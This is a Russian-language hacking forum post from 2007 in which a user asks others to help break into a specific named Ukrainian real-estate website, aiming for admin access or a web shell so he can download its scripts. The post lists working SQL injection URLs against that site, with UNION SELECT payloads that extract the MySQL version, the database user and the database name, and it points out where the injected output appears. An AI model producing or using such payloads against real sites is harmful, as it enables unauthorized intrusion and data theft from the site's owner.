|
Новичок
Регистрация: 30.09.2007
Сообщений: 12
Провел на форуме:
59035
Репутация:
14
|
|
Народ, хелп, помогите заюзать сайтец, очень нужно узнать или доступ к админке или шелл залить..., основная цель - эт выкачать скрипты.
(Сайт дырявый как сито)
P.S ща вот сам колупаю, еси у кого получиться скидуйте сюда...
http://www.megaholl.com.ua/find_flat.php?a=1&d%5B%5D=16&d%5B%5D=21&d%5B%5D=22 &d%5B%5D=23&d%5B%5D=26&d%5B%5D=39))+union+select+u ser(),user(),3,4,5,6,user(),user(),user(),user(),u ser(),user(),13,14,15,16,17,18,19,20,21,22,23/*&sm=s1a&sr=n
или вот:
http://www.megaholl.com.ua/find_stead.php?a=2'
----------------------------------------------------------------------------
Вот версия мускула: http://www.megaholl.com.ua/4.1.22-standard/2.html
Вот так узнал версию:
http://www.megaholl.com.ua/find_stead.php?a=2)+union+select+version(),2,3,4,5 ,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23/*&sm=s1d&sr=t
Вот пользователь: http://www.megaholl.com.ua/u_megaholl@localhost/2.html
Во так узнал пользователя:
http://www.megaholl.com.ua/find_stead.php?a=2)+union+select+user(),2,3,4,5,6, 7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23/*&sm=s1d&sr=t
Вот БД:
http://www.megaholl.com.ua/megaholl/2.html
Вот так узнал имя ДБ:
http://www.megaholl.com.ua/find_stead.php?a=2)+union+select+database(),2,3,4, 5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,2 3/*&sm=s1d&sr=t
Названия таблиц - немогу узнать, т.к пишет ошибка, но явная ошибка невысвечуеться (скрыто тут такое)
Вот для наглядности чтобы вы неискали где выводяться данные, я кстате случайно заметил, думал что там фильтруеться, ггг
Вот: http://www.megaholl.com.ua/find_stead.php?a=2)+union+select+database(),'wwwww wwwwwwwwwwwwwwww',3,4,5,6,7,8,9,10,11,12,13,14,15, 16,17,18,19,20,21,22,23/*&sm=s1d&sr=t
Последний раз редактировалось FFFFx029A; 10.10.2007 в 11:43..
|
Похожие темы
Древовидный вид